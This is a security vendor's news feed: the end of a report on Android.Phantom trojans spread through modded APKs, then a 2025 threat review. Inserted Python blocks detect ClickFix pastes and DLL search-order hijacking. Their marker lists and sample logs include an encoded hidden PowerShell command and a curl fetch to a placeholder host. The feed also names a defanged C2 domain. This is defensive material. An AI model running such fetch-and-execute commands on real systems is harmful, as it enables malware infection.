These catalogues are also available as Telegram channels where users download modified APK files containing trojans:&lt;/p&gt;&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Moddroid.com&lt;/i&gt;&lt;br&gt;&lt;i&gt;(87,653 subscribers)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Apkmody Chat&lt;/i&gt;&lt;br&gt;&lt;i&gt;(6,297 subscribers)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Criminals also use Discord servers to promote and spread the infected apps. Spotify X is the most popular one. 
It has about 24,000 subscribers.&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Its administrators don't shy away from offering compromised APK files to users in a more direct fashion. For example, the screenshot above shows how an administrator is offering visitors a Deezer music streaming app for download instead of a Spotify application, since the latter has stopped working.&lt;/p&gt;&lt;p&gt;The download link will provide the user with a program that actually works. Its code is protected with a proprietary packer concealing&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;. Upon receiving an instruction from &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt;, it will download the now well-familiar&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;,&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.5&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;, and the spyware trojan &lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.5.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;. 
The latter relays to the attackers information about the device—including the phone number, location, and a list of the installed apps.&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;This screenshot of the server shows what languages the impacted users speak. To access chat rooms in languages other than English, they have to react to the appropriate flag. Users who spoke Spanish, French, German, Polish and Italian appeared to be in the majority (English, which appears to be the server’s default language, is not factored in). Furthermore, the server administrators didn’t set up chat rooms for many Asian countries.&lt;/p&gt;&lt;p&gt;These trojans can inflict severe damage on the owners of infected devices. Here are just a few of the possible adverse consequences:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;&lt;strong&gt;An unsuspecting accomplice.&lt;/strong&gt; A user's smartphone can be commandeered to partake in a DDoS attack and, by doing so, get its owner unwittingly involved in a cybercrime.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Illegal activity.&lt;/strong&gt; Attackers can use a compromised device to conduct illegal activities: run online fraud schemes or send spam messages.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Increased battery use and traffic.&lt;/strong&gt; Covert activities drain the battery and increase mobile data usage.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Personal data leaks.&lt;/strong&gt; &lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.5.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt; is spyware that will transmit information about the device and its owner to a third party.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Trojans of this strain pose a threat to 
Android device owners who don't use up-to-date antivirus software. Sometimes users experience availability issues involving foreign online services, which forces them to seek out and use alternative and often shady methods to circumvent restrictions. This situation plays into the hands of virus makers as users are more likely to take chances and put their faith in dubious techniques. Children are particularly vulnerable. In their drive to play videogames, listen to music or watch videos, they tend to completely disregard information security basics.&lt;/p&gt;&lt;p&gt;We strongly advise you against downloading modified APK files from dubious sites and Telegram channels. As a rule, verifying the sources of such mods or apps takes time and requires some experience. That’s why using Dr.Web Security Space is probably the best way to ensure that you and your loved ones enjoy a worry-free experience with your mobile devices. Dr.Web protects not only smartphones but also game consoles, tablets and smart TVs.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Phantom/README.adoc"&gt;Indicators of compromise&lt;/a&gt;&lt;br /&gt;
More about &lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
More about &lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.2.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
More about &lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.3&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.3&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
More about &lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.4.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
More about &lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.5&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
More about &lt;a href="https://vms.drweb.com/search/?q=Android.Phantom.5.origin&amp;lng=en"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15102&amp;lng=en</guid><title>Doctor Web’s virus activity review for 2025</title><link>https://news.drweb.com/show/?i=15102&amp;lng=en&amp;c=5</link><pubDate>Thu, 15 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;January 15, 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;In 2025, trojans designed to display ads were one of the most active threats. Users also encountered various malicious scripts and trojan programs that launch other malware in infected systems. In email traffic, trojan downloaders, backdoors, exploits, malicious scripts, and phishing documents were most commonly detected.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Among mobile threats, the most widespread were ad-displaying trojans and fake apps used in a variety of fraudulent schemes. An increase in banking trojan activity was also observed. At the same time, Doctor Web’s virus analysts discovered dozens of new malicious, unwanted, and adware programs on Google Play.&lt;/p&gt;

&lt;p&gt;Compared to 2024, Doctor Web received fewer user requests to decrypt files affected by encoder trojans. Meanwhile, over the last year, our Internet analysts detected more fraudulent websites created to steal &lt;i&gt;Telegram&lt;/i&gt; accounts. Moreover, unwanted financial websites were popular once again.&lt;/p&gt;

&lt;p&gt;In 2025, Doctor Web’s anti-virus laboratory investigated several targeted attacks, one of which was carried out on a Russian engineering company. During the attack, threat actors used a number of malicious apps in an attempt to obtain confidential data from infected computers. Our experts ascertained that the Scaly Wolf hacker group was involved in the attack. Another incident occurred when a Russian government organization was attacked by the Cavalry Werewolf hacker group. Doctor Web’s virus analysts discovered many of the malicious tools used by these threat actors and also studied the features of the group and the actions it typically performs in compromised networks.&lt;/p&gt;

&lt;p&gt;Throughout last year, Doctor Web also reported on other information security incidents. In January, our anti-virus laboratory discovered an active campaign that was being orchestrated by cybercriminals who were using a variety of different malware programs to mine Monero cryptocurrency. In April, we informed users about a trojan that cybercriminals had embedded in the firmware of several budget Android smartphone models in order to use it to steal cryptocurrency. Also in April, our experts identified an Android trojan that malicious actors had embedded into a version of a popular mapping software program and were using to spy on Russian military personnel.&lt;/p&gt;

&lt;p&gt;In July, Doctor Web informed users about a new family of trojans designed to steal cryptocurrency and passwords. Malicious actors distributed them under the guise of game mods, patches, and cheats. In August, our virus analysts warned about the distribution of a multi-functional backdoor for mobile devices that was targeting employees of Russian businesses. Cybercriminals remotely controlled this malware and used it to steal confidential data and spy on victims.&lt;/p&gt;

&lt;p&gt;In October, we published information about a backdoor for Android devices that cybercriminals were distributing as part of modified versions of the &lt;i&gt;Telegram X&lt;/i&gt; messenger. This malicious program steals logins and passwords for &lt;i&gt;Telegram&lt;/i&gt; accounts and other sensitive data. With its help, the attackers can control the victims’ hacked accounts and gain full control over the messenger itself, performing various actions on behalf of account owners.&lt;/p&gt;

&lt;p&gt;In December, we released an article about a trojan that artificially increases the popularity of websites by pretending to be a real human so that its actions are not blocked by the anti-bot protection on the sites. This malware independently seeks out target websites in search engines, opens them, and performs clicks on the opened web pages, based on the parameters it receives from the threat actors.&lt;/p&gt;

&lt;p&gt;The year 2025 also saw a rise in the popularity of ClickFix attacks, in which malicious actors use social engineering to trick users into running malicious code on their devices.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principal trends of the year&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Trojans designed to display ads were highly active&lt;/li&gt;
        &lt;li&gt;New targeted attacks occurred&lt;/li&gt;
        &lt;li&gt;Attacks using the ClickFix method became more popular&lt;/li&gt;
        &lt;li&gt;The number of incidents involving encoder trojans decreased&lt;/li&gt;
        &lt;li&gt;The number of Android banking trojan detections increased&lt;/li&gt;
        &lt;li&gt;New cases of Android device firmware infections were identified&lt;/li&gt;
        &lt;li&gt;Various malicious and unwanted programs were again distributed via Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;The most notable events of 2025&lt;/h3&gt;

&lt;p&gt;In January 2025, Doctor Web’s specialists &lt;a href="https://news.drweb.com/show/?i=14976&amp;lng=en" target="_blank"&gt;uncovered&lt;/a&gt; a campaign to mine Monero cryptocurrency using the malicious miner SilentCryptoMiner. Its files were disguised as various software, like programs for making video calls. When infecting computers, they removed other miners that might have been previously installed in the system. As part of this campaign, the attackers used steganography, a technique that allows certain data to be hidden among other data (for example, in images), to distribute some of the malicious components. After the specially crafted images were downloaded, the corresponding SilentCryptoMiner components were extracted from them and launched.&lt;/p&gt;

&lt;p&gt;In April, our virus analysts &lt;a href="https://news.drweb.com/show/?i=15002&amp;lng=en" target="_blank"&gt;informed&lt;/a&gt; users about the &lt;a href="https://vms.drweb.com/search/?q=Android.Clipper.31&amp;lng=en"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; trojan found in the firmware of a number of budget Android smartphone models. Threat actors built this trojan into a modified version of the &lt;i&gt;WhatsApp&lt;/i&gt; messenger, which they then preinstalled on devices after compromising the supply chain of some manufacturers. &lt;a href="https://vms.drweb.com/search/?q=Android.Clipper.31&amp;lng=en"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; intercepts messages sent in the trojanized messenger, searches them for Tron and Ethereum crypto wallet addresses, and replaces those addresses with ones belonging to the attackers. At the same time, the malware conceals the substitution: victims see the original crypto wallet addresses in such messages.&lt;/p&gt;

&lt;p&gt;Later in April, Doctor Web’s experts &lt;a href="https://news.drweb.com/show/?i=15006&amp;lng=en" target="_blank"&gt;discovered&lt;/a&gt; the &lt;a href="https://vms.drweb.com/search/?q=Android.Spy.1292.origin&amp;lng=en"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; trojan, which cybercriminals had embedded into a version of the Alpine Quest mapping software and used to spy on Russian military personnel. The malware collected confidential information and allowed the attackers to steal files from the infected devices.&lt;/p&gt;

&lt;p&gt;In July, Doctor Web released &lt;a href="https://news.drweb.com/show/?i=15036&amp;lng=en" target="_blank"&gt;news material&lt;/a&gt; on its website covering &lt;a href="https://vms.drweb.com/search/?q=Trojan.Scavenger&amp;lng=en"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt; malicious programs, which are designed to steal cryptocurrency and passwords. The attackers distributed these under the guise of game mods, cheats, patches, etc. The trojans were launched using legitimate software, including via the exploitation of DLL Search Order Hijacking class vulnerabilities.&lt;/p&gt;

&lt;p&gt;In August, our specialists &lt;a href="https://news.drweb.com/show/?i=15047&amp;lng=en" target="_blank"&gt;notified&lt;/a&gt; users about the spread of the multi-functional backdoor &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, which was targeting representatives of Russian companies. The malware, disguised as anti-viruses, was distributed via direct messages in messengers. Once the target devices were infected, &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; collected confidential data and allowed the attackers to spy on victims.&lt;/p&gt;

&lt;p&gt;Also in August, Doctor Web’s anti-virus laboratory &lt;a href="https://news.drweb.com/show/?i=15046&amp;lng=en" target="_blank"&gt;released a study&lt;/a&gt; on a targeted attack that was perpetrated by the Scaly Wolf group against a Russian engineering company. Cybercriminals deployed a number of malicious tools, one of the main ones being the modular backdoor Updatar. It allowed the attackers to collect confidential data from the infected computers.&lt;/p&gt;

&lt;p&gt;In October, Doctor Web’s experts &lt;a href="https://news.drweb.com/show/?i=15076&amp;lng=en" target="_blank"&gt;warned&lt;/a&gt; about the &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; backdoor built into maliciously modified versions of the &lt;i&gt;Telegram X&lt;/i&gt; messenger. &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; steals logins and passwords for &lt;i&gt;Telegram&lt;/i&gt; accounts along with some other confidential data. The malware allows threat actors to gain full control over a user’s account and to control the messenger, performing actions in it on behalf of the victim. For example, the attackers can covertly join and leave &lt;i&gt;Telegram&lt;/i&gt; channels and also conceal newly authorized devices in the interface of the trojanized &lt;i&gt;Telegram X&lt;/i&gt;.&lt;/p&gt;

&lt;p&gt;In November, we published a &lt;a href="https://news.drweb.com/show/?i=15078&amp;lng=en" target="_blank"&gt;study&lt;/a&gt; on a targeted attack that the Cavalry Werewolf hacker group had carried out against a Russian government organization. During their investigation of the incident, Doctor Web’s experts discovered many of the attackers’ malicious tools, including open-source instruments. Our virus analysts studied the group’s features and found that the threat actors prefer to use reverse shell backdoors and often use the &lt;i&gt;Telegram&lt;/i&gt; API to control infected computers. Moreover, they begin their attacks by sending phishing emails purporting to come from government agencies and attach malware disguised as various official documents to these messages.&lt;/p&gt;

&lt;p&gt;In December, Doctor Web published its &lt;a href="https://news.drweb.com/show/?i=15090&amp;lng=en" target="_blank"&gt;analysis&lt;/a&gt; of the &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire&amp;lng=en"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; malware, which artificially increases the popularity of websites, while pretending to be human. This trojan searches target sites via the Google and Bing search engines, opens the sites it has found, and performs clicks on their web pages in accordance with tasks received from the malicious actors. &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire&amp;lng=en"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; is installed on computers by a number of malicious programs that exploit DLL Search Order Hijacking class vulnerabilities.&lt;/p&gt;

&lt;p&gt;During 2025, attacks using the ClickFix method became more popular. The method relies on social engineering: cybercriminals trick potential victims into running malicious code themselves. When users visit a malicious or compromised website, it reports a supposed error or the need to update their browser and offers to “fix” the problem. Depending on the attack variant, users are either asked to copy the strings shown on the web page or simply to click the corresponding button (for example, “Update” or “Fix”); in the latter case, the content the attackers need is copied to the clipboard automatically. Users are then instructed to open a command prompt or a PowerShell terminal, paste the clipboard contents there, and press Enter. As a result, victims execute the malicious code themselves, which starts the infection chain. More information about ClickFix attacks can be found in the corresponding &lt;a href="https://news.drweb.com/show/?i=15074&amp;lng=en" target="_blank"&gt;article&lt;/a&gt; on our website.&lt;/p&gt;
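&lt;p&gt;The endpoint side of the flow described above, as an added example that is not part of Doctor Web’s article: a Python heuristic run over constructed process-creation records that flags a command executed from an interactive cmd.exe or PowerShell console opened from explorer.exe when the command line fetches, decodes or evaluates remote content. The record format, field names, parent-chain rule and marker list are assumptions made for this example.&lt;/p&gt;

```python
"""Heuristic ClickFix detection over constructed process-creation records.

ClickFix ends with the victim pasting clipboard text into a console they opened
themselves and pressing Enter. On the endpoint that appears as an interactive
shell started from explorer.exe whose child process carries a command line that
fetches or decodes remote content. Everything below (record format, field
names, markers, sample log) is constructed for this example and is not Doctor
Web's code or data.
"""
import re

INTERACTIVE_SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Markers a defender would expect in a pasted "fix" command; an assumed,
# non-exhaustive list, matched case-insensitively against the command line.
REMOTE_EXEC_MARKERS = (
    "http://", "https://", "invoke-webrequest", "iwr ", "downloadstring",
    "invoke-expression", "iex ", "-encodedcommand", "-enc ", "mshta", "curl ",
)

LINE_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line):
    """Parse one constructed key="value" record into a dict."""
    return {k: v for k, v in LINE_RE.findall(line)}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parent_chain(event, by_pid):
    """Yield ancestor image basenames, nearest first, following ppid links."""
    seen = set()
    pid = event.get("ppid")
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        parent = by_pid[pid]
        yield basename(parent["image"])
        pid = parent.get("ppid")


def clickfix_indicators(event, by_pid):
    """Return the reasons this event looks like a pasted ClickFix command.

    An empty list means not flagged. All three conditions are assumed heuristics:
      1. the direct parent is an interactive shell (cmd/powershell),
      2. that shell was itself started from explorer.exe (a user-opened console),
      3. the command line contains a remote-fetch, decode or execute marker.
    """
    chain = list(parent_chain(event, by_pid))
    if not chain or chain[0] not in INTERACTIVE_SHELLS:
        return []
    if chain[1:2] != ["explorer.exe"]:
        return []
    cmd = event.get("cmdline", "").lower()
    hits = [m.strip() for m in REMOTE_EXEC_MARKERS if m in cmd]
    if not hits:
        return []
    return ["parent shell " + chain[0] + " launched from explorer.exe",
            "command line markers: " + ", ".join(hits)]


def scan(lines):
    """Return {pid: reasons} for every flagged record in the constructed log."""
    events = [parse_event(line) for line in lines if line.strip()]
    by_pid = {e["pid"]: e for e in events}
    flagged = {}
    for e in events:
        reasons = clickfix_indicators(e, by_pid)
        if reasons:
            flagged[e["pid"]] = reasons
    return flagged


# Constructed sample log: a benign console session (pids 200/201), a pasted
# ClickFix-style command (pid 301) and a shell with an unknown parent (pid 400).
SAMPLE_LOG = [
    'pid="100" ppid="1" image="C:\\Windows\\explorer.exe" cmdline="explorer.exe"',
    'pid="200" ppid="100" image="C:\\Windows\\System32\\cmd.exe" cmdline="cmd.exe"',
    'pid="201" ppid="200" image="C:\\Windows\\System32\\ipconfig.exe" cmdline="ipconfig /all"',
    'pid="300" ppid="100" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmdline="powershell.exe"',
    'pid="301" ppid="300" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmdline="powershell -w hidden -enc PLACEHOLDER"',
    'pid="400" ppid="150" image="C:\\Windows\\System32\\cmd.exe" cmdline="cmd.exe /c curl https://example.invalid/x"',
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_LOG).items():
        print(pid, "-", "; ".join(reasons))
```

&lt;p&gt;Only pid 301 is flagged: pid 201 runs a harmless command from a user console, and pid 400 has no recorded parent chain, so the heuristic does not fire on it.&lt;/p&gt;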

&lt;h3&gt;The malware landscape&lt;/h3&gt;

&lt;p&gt;According to statistics collected by the Dr.Web anti-virus, the total number of threats detected in 2025 increased by 5.45%, compared to 2024. The number of unique threats decreased by 15.89%. Users most often encountered various malicious scripts and adware trojans. In addition, trojans that launch other malicious apps were commonly detected. Users were also targeted by trojans created in the AutoIt scripting language and distributed as part of other malware to make the latter more difficult to detect.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/01_stat_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/01_stat_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A malicious script that, in an infinite loop, searches for windows containing the text &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt;, and &lt;span class="string"&gt;розробника&lt;/span&gt; and sends them an Escape key press event, forcibly closing them.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4242&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for a malicious component of the WinSafe browser extension. This component is a JavaScript file that displays intrusive ads in browsers.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8319&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8326&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8332&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for malicious XML scripts that launch &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; malware and its components.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen30.53926&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name of an Electron framework host process modified by threat actors. It mimics a Steam application component (Steam Client WebHelper) and loads a JavaScript backdoor.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.MalVpn.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A malicious script that various malicious programs use to connect to C2 servers.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A trojan written in the Go programming language and designed to download various miner trojans and adware into infected systems. This malware is a DLL file located at &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. To launch, it exploits a DLL Search Order Hijacking vulnerability in the uTorrent torrent client.&lt;/dd&gt;
&lt;/dl&gt;
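&lt;p&gt;A baseline check for the DLL Search Order Hijacking technique used by &lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt; and the &lt;b&gt;Trojan.Scavenger&lt;/b&gt; and &lt;b&gt;Trojan.ChimeraWire&lt;/b&gt; loaders mentioned above, added here as an example and not Doctor Web’s code: a Python routine over constructed image-load records that flags a module loaded from a user-writable directory when it is missing from the application’s expected-module baseline or shares its name with a Windows system DLL. The record format, the baseline, the directory markers and the system DLL subset are assumptions.&lt;/p&gt;

```python
"""Baseline check for DLL search order hijacking over constructed image-load records.

Trojan.Siggen31.34463 is described above as a DLL planted at
%appdata%\\utorrent\\lib.dll and loaded by the uTorrent client because the
application directory is searched before the system directories. A defender can
catch such loads by comparing what a process actually maps against a baseline
of expected modules and by watching for system DLL names served from
elsewhere. Records, baseline and DLL lists below are constructed for this
example; this is not Doctor Web's code.
"""
from collections import defaultdict

# Locations a standard user can write to and therefore plant a DLL in
# (assumed, partial list; matched as path fragments).
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")

# Common Windows system DLL names; a same-named file loaded from outside the
# system directories is a classic search-order hijack. Illustrative subset only.
SYSTEM_DLL_NAMES = {"kernel32.dll", "user32.dll", "version.dll", "dbghelp.dll",
                    "cryptbase.dll", "wininet.dll"}

SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")


def norm(path):
    return path.replace("/", "\\").lower()


def basename(path):
    return norm(path).rsplit("\\", 1)[-1]


def dirname(path):
    return norm(path).rsplit("\\", 1)[0]


def is_user_writable(path):
    padded = norm(path) + "\\"
    return any(marker in padded for marker in USER_WRITABLE_MARKERS)


def loaded_from_system_dir(path):
    return dirname(path).startswith(SYSTEM_DIRS)


def classify_load(process_image, dll_path, baseline):
    """Return findings for one (process, loaded DLL) pair; an empty list means benign."""
    exe = basename(process_image)
    dll = basename(dll_path)
    findings = []
    if dll in SYSTEM_DLL_NAMES and not loaded_from_system_dir(dll_path):
        findings.append("system DLL name " + dll + " loaded from " + dirname(dll_path))
    if is_user_writable(dll_path) and dll not in baseline.get(exe, set()):
        findings.append(dll + " is not in the " + exe
                        + " baseline and sits in a user-writable directory")
    return findings


def scan(loads, baseline):
    """Group findings by process image over (process_image, dll_path) records."""
    report = defaultdict(list)
    for process_image, dll_path in loads:
        for finding in classify_load(process_image, dll_path, baseline):
            report[basename(process_image)].append(finding)
    return dict(report)


# Constructed baseline: modules each application is expected to load from its own
# directory. A real baseline is taken from a known-good installation.
BASELINE = {"utorrent.exe": {"utorrent.exe"}}

# Constructed image-load records. The lib.dll path follows the page's description;
# the other entries are benign or illustrative.
SAMPLE_LOADS = [
    ("C:\\Users\\alice\\AppData\\Roaming\\uTorrent\\uTorrent.exe",
     "C:\\Windows\\System32\\kernel32.dll"),
    ("C:\\Users\\alice\\AppData\\Roaming\\uTorrent\\uTorrent.exe",
     "C:\\Users\\alice\\AppData\\Roaming\\uTorrent\\lib.dll"),
    ("C:\\Program Files\\Tool\\tool.exe", "C:\\Program Files\\Tool\\helper.dll"),
    ("C:\\Users\\alice\\Downloads\\setup.exe", "C:\\Users\\alice\\Downloads\\version.dll"),
]

if __name__ == "__main__":
    for exe, findings in scan(SAMPLE_LOADS, BASELINE).items():
        for finding in findings:
            print(exe + ": " + finding)
```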

&lt;p&gt;In email traffic, trojans that download and install other malware were most commonly detected in 2025. Threat actors also distributed various backdoors, exploits, phishing documents, and malicious scripts via email messages.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/02_email_traffic_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/02_email_traffic_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A family of downloader trojans that exploit vulnerabilities in Microsoft Office documents. They can also download other malicious programs to a compromised computer.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Exploits designed to take advantage of Microsoft Office software vulnerabilities and allow an attacker to run arbitrary code.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.684&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.745&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A malicious JavaScript script that generates a phishing web page.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;BackDoor.AgentTeslaNET.20&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Spyware designed to steal confidential information. For example, it collects logins and passwords from numerous programs, such as browsers, messengers, email clients, databases, and more, and sends them to the attackers. It also steals clipboard contents, provides keylogging functionality, and can take screenshots.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Win32.Expiro.153&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A file virus that infects Windows executable files. Its main purpose is to steal passwords for various programs.&lt;/dd&gt;
